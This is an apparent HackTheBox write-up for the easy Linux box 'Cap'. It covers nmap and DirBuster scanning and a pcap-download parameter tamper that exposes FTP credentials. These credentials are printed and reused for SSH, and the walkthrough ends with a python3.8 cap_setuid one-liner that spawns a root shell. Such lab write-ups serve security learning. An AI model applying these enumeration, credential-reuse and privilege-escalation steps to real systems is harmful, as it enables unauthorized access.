TL:DR
This is a walkthrough writeup on Cap which is a Linux box categorized as easy on HackTheBox. The initial foothold was gained by exploiting the parameter tampering vulnerability on the webpage, that exposed the credentials for FTP, which were also valid for SSH due to password reusability. Privilege escalation was rather easy on this one, in which we exploited the capabilities set for the user.
Cap Writeup: Scanning Network
Running the usual Nmap port scan :
Command used --> nmap -n -Pn -A -sC -sV -v -oN nmap.initial 10.10.10.245
Nmap scan report for 10.10.10.245
Host is up (0.19s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http gunicorn
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Server: gunicorn
| Date: Mon, 25 Oct 2021 05:12:02 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Mon, 25 Oct 2021 05:11:56 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 19386
| <!DOCTYPE html>
| <html class="no-js" lang="en">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Security Dashboard</title>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
| <link rel="stylesheet" href="/static/css/bootstrap.min.css">
| <link rel="stylesheet" href="/static/css/font-awesome.min.css">
| <link rel="stylesheet" href="/static/css/themify-icons.css">
| <link rel="stylesheet" href="/static/css/metisMenu.css">
| <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
| <link rel="stylesheet" href="/static/css/slicknav.min.css">
| <!-- amchar
| HTTPOptions:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Mon, 25 Oct 2021 05:11:56 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Allow: GET, OPTIONS, HEAD
| Content-Length: 0
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Connection: close
| Content-Type: text/html
| Content-Length: 196
| <html>
| <head>
| <title>Bad Request</title>
| </head>
| <body>
| <h1><p>Bad Request</p></h1>
| Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
| </body>
|_ </html>
| http-methods:
|_ Supported Methods: GET OPTIONS HEAD
|_http-server-header: gunicorn
|_http-title: Security Dashboard
We have :port 21 : FTPport 22 : SSHport 80 : web-server
I checked for anonymous FTP login, but it was disabled.
Running a Dirbuster Scan
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
--------------------------------
http://10.10.10.245:80
--------------------------------
Directories found during testing:
Dirs found with a 200 response:
/
--------------------------------
Files found during testing:
Files found with a 200 responce:
/ip
/netstat
/static/js/vendor/modernizr-2.8.3.min.js
/static/js/popper.min.js
/static/js/bootstrap.min.js
/static/js/metisMenu.min.js
/static/js/owl.carousel.min.js
/static/js/jquery.slimscroll.min.js
/static/js/jquery.slicknav.min.js
/static/js/vendor/jquery-2.2.4.min.js
/static/js/plugins.js
/static/js/pie-chart.js
/static/js/scripts.js
/static/js/line-chart.js
Files found with a 302 responce:
/capture
--------------------------------Let’s go ahead with the website enumeration.
Website Enumeration
ifconfig command
netstat command on going to the Network Status option.
Cap Writeup : Initial Foothold
- I tried to intercept the requests with BurpSuite.
- Initially I thought that for those “ipconfig” & “netstat” pages, the request probably contained the command that was executed on the server, & I could simply replace this command with a reverse shell. But nope, that wasn’t the case.
- Although, that (5 Second PCAP & Analysis) allowed us to download the PCAP file.
- By default, it allowed us to download
/data/1but when I tried to tamper with this parameter, I found that there exists a/data/0file which seemed to have useful data. - Any entry used after 0 had no data, as seen in the images below :
What is a .pcap file ?
Packet Capture or PCAP files are data files created using the program and they contain the packet data of a network. These files are mainly used in analyzing the network characteristics of a certain data.
/data/ parameterDownloading the /data/0 PCAP file as it has some data.
/data/0 PCAP fileOpening & examining that PCAP file with Wireshark β>
1.pcap file was empty, although 0.pcap had data !
Examining the PCAP file
Opening the pcap file using Wireshark, we could see FTP packets. On following the TCP stream for those FTP packets, we were greeted with the FTP credentials π
pcap file in wireshark
FTP Creds
user: nathan
pass: Buck3tH4TF0RM3!Cap Writeup: User Flag β³
Logging in with those FTP creds :
ββ[root@kali]β[~/Desktop/Boxes/HTB/Cap]
ββββΌ ftp $IP
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:root): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
257 "/home/nathan" is the current directory
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r-------- 1 1001 1001 33 Oct 25 05:03 user.txt
226 Directory send OK.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for user.txt (33 bytes).
226 Transfer complete.
33 bytes received in 0.00 secs (19.9917 kB/s)
-------------------------------------------------------------------------------------
cat user.txt
cb580***************************Privilege Escalation
We also tried those FTP creds for SSH, because you never know , and indeed πwe were able to SSH into the box as user Nathan with those creds.
ssh nathan@$IP- We went ahead to search for sudo permissions, SUID binaries and capabilities that could escalate the privileges by giving us the root shell.
- And as expected from the name of the box “Cap”, giving off a hint about exploiting capabilities, we found
cap_setuidset for thepython3.8binary on the target.
nathan@cap:~$ getcap -r / 2>/dev/null
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
Checking GTFO bins for the above capability β> python | GTFOBins
Root Flagβ³
nathan@cap:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'
root@cap:/root# id
uid=0(root) gid=1001(nathan) groups=1001(nathan)
root@cap:~# pwd
/home/nathan
root@cap:~# cd /root
root@cap:/root# ls
root.txt snap
root@cap:/root# cat root.txt
0e13d***************************That was it for Cap.
Until next time, do checkout other informative writeups and blogs here.
